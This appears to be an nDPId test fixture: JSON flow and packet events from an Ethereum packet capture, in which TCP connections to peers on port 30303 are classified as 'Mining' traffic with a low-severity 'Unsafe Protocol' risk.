00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1578508365736,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365736,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHpIMAAEARoqnAqAG4b+UAtHZfTtYAsxSK2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
